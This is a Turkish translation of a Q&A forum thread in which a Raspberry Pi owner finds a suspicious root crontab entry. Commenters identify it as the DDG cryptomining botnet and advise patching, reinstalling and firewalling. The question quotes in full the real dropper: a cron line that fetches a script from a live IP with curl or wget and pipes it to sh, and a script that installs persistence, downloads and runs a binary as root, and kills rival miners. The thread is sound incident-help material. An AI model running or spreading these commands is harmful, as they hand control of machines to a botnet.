Her 15 dakikada bir 'xribfa4' çalışan şüpheli crontab girişi

58

Raspberry Pi'mdeki kök crontab dosyama bir şey eklemek istedim ve bana şüpheli görünen bir girdi buldum, bunun bir kısmını Google'da aradım.

Crontab girişi:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

İçeriği http://103.219.112.66:8000/i.sh:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

Benim Linux bilgim sınırlıdır, ancak bana göre bir Endonezya sunucusundan ikili dosya indirme ve bunları düzenli olarak root olarak çalıştırma normal bir şey değildir.

Bu nedir? Ne yapmalıyım?

security  cron  malware 
Peter Barajı
kaynak
16
Dairesel. Her 15 dakikada bir, yeni bir kopyasını indirip yükler. Eğer uzak sunucudaki kopya değiştirilirse / bu cronjob'ı çalıştıran tüm sunucular 15 dakika içinde yeni kod ne olursa olsun çalıştırılır.
Wildcard
5
Ahududu pi'niz internete açık mı? Ahududu pi'niz kaçıyor? Bu, xribfa4'ü aradığımda google’daki tek sonuç. Bunu yapmak için gereken yazılımı çalıştırmıyorsanız, bu muhtemelen bir virüs.
kemotep
6
@kemotep bu dize rastgele, ancak IP için google ve birkaç sonuç verir. Bir ddg madencilik botnet hakkında bir şey
frostschutz
9
Buldum. IP bir Endonezya Hükümeti sitesine kayıtlı olması onun çılgınca. Ayrıca bu taşıma yükünü teslim eden 2000 kadar ips varmış gibi görünüyor.
kemotep
21
Dikkat etmeniz gereken en önemli şey, bu crontab girişini kaldırsanız bile, sisteminizin büyük olasılıkla virüs bulaşmasına izin veren güvenlik açığına sahip olmasıdır. Bu güvenlik açığını bulup düzeltmeniz gerekir.
Hans-Martin Mosner 02:15

Yanıtlar:

79

Bir DDG madenciliği botnet, nasıl çalıştığını:

  1. bir RCE güvenlik açığından yararlanarak
  2. crontab'ın değiştirilmesi
  3. uygun madencilik programının indirilmesi (go ile yazılmış)
  4. madencilik sürecine başlamak

DDG: Veritabanı Sunucularına Yönelik Bir Madencilik Botnet'i

Bir botnet başka bir botnet altyapısını ödünç aldığında SystemdMiner

U&L: Bir AWS EC2 örneğinde madenci kötü amaçlı yazılımı nasıl öldürebilirim? (bozulmuş sunucu)

GAD3R
kaynak
4
Evet, aslında öyle görünüyor. Teşekkürler! Yeni bir şey çıkmazsa, bunu bir cevap olarak işaretleyeceğim.
Peter Barajı
8
Köklü bir makine için genel tavsiyeyi unutmayın: nasıl girdiklerini anlamaya çalışın, böylece deliği düzeltebilirsiniz. Bundan öğren ve güvenliğini arttır. Sonunda, nükleer ve makineyi yeniden yükleyin.
marcelm
3
İyi haber şu ki Pi için madenci gibi görünmüyorlar, sadece i686 ve x86_64 için.
Mark
13
@Mark Bu nasıl iyi haber? Birisi, bilinmeyen bir giriş noktası kullanarak Pi'si üzerinde tam kontrol sahibi oldu ve Pi üzerindeki sırlara tam erişime sahipti (şifreler dahil ancak bunlarla sınırlı olmamak üzere). Madenci çalışıyor olsun veya olmasın, gerçekten "küçük rahatsızlık" alanında.
marcelm
4
@ marcelm, saldırgan üzerinde tam bir kontrol kazandı ve sonrasında neredeyse kesinlikle bu kontrolle önemli bir şey yapmadı.
Mark
2

Hangi TCP ve UDP bağlantı noktalarının gerçekten gerekli olduğunu belirleyin ve ardından yönlendiricinizin güvenlik duvarındaki diğer tüm bağlantı noktalarını engelleyin. Muhtemelen , bu crontab girişleri tekrar görünmeyecek.

Kalkanlar Yukarı'yı kullanarak hangi bağlantı noktalarının açık ve genel olduğunu görebilirsiniz . grc.com'da bir özellik .

Mike Waters
kaynak
5
Veya güvenlik açığını düzeltebilir.
Harper - Monica
1
@Herper Kesinlikle! Bu bir verilen. Belki de ilk önce kullanılmayan limanları engellemeden, yamalamaya çalışırken reddedilebileceğini düşünüyordum.
Mike Waters
1
Güvenlikten ilgili
yorum.SE
1
Bu (her zaman sadece TCP ve UDP ile sınırlı değil). Aka pozitif güvenlik modeli, beyaz liste veya varsayılan olarak reddet - açıkça kullanmadığınız veya ihtiyaç duymadığınız tüm trafiği reddeder - deliklerinizden hiçbirinin sızmaya maruz kalmamasını sağlamanın tek yolu.
antichris
Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.